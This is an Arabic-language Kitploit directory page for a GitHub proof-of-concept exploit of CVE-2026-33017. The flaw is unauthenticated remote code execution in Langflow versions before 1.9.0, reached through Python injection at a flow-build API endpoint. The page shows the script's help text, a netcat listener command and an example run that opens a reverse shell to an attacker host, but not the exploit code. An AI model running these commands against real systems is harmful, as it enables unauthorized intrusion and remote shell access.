Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33017-Langflow-RCE — استغلال CVE-2026-33017 | بواسطة infrar3d | Kitploit
أدوات/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce

CVE-2026-33017-Langflow-RCE

استغلال CVE-2026-33017 | بواسطة infrar3d

عرض المستودع
111منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33017 - ثغرة تنفيذ الأوامر عن بُعد في Langflow

تم استغلالها بواسطة infrar3d

يستهدف هذا الاستغلال البرهاني (Proof-of-Concept) ثغرة حرجة لتنفيذ الأوامر عن بُعد (RCE) في إصدارات Langflow السابقة للإصدار 1.9.0. تسمح الثغرة للمهاجمين غير المصادَق عليهم بتنفيذ أوامر نظام عشوائية عن طريق حقن كود Python خبيث عبر نقطة نهاية API الخاصة ببناء التدفقات. تكمن الثغرة في نقطة النهاية /api/v1/build_public_tmp/{flow_id}/flow endpoint، التي لا تُعقّم بشكل صحيح الكود المقدَّم من المستخدم في حقل الكود الخاص بقوالب المكونات.

الاستخدام:

root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]

Langflow RCE Exploit

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target base URL
  -f, --flow FLOW  Flow ID
  -H, --host HOST  Listener host for reverse shell
  -P, --port PORT  Listener port (default: 4444)
                                         

مثال:

الطرفية الأولى (المستمع):

root@kitploit:~
nc -lvnp 4444

الطرفية الثانية (الاستغلال):

root@kitploit:~
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444 

⚠️ إخلاء مسؤولية ⚠️

هذا البرنامج وكود الإثبات البرهاني (Proof-of-Concept) مقدَّمان لأغراض تعليمية وبحثية فقط.

  • المؤلّفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
  • لا تستخدمه ضد أي أنظمة دون إذن مسبق صريح.
  • استخدام هذه الأدوات لمهاجمة أهداف دون موافقة غير قانوني.

أنت مسؤول عن الامتثال لجميع القوانين المعمول بها. استخدمه بأخلاقية ومسؤولية.

تنزيل الأداة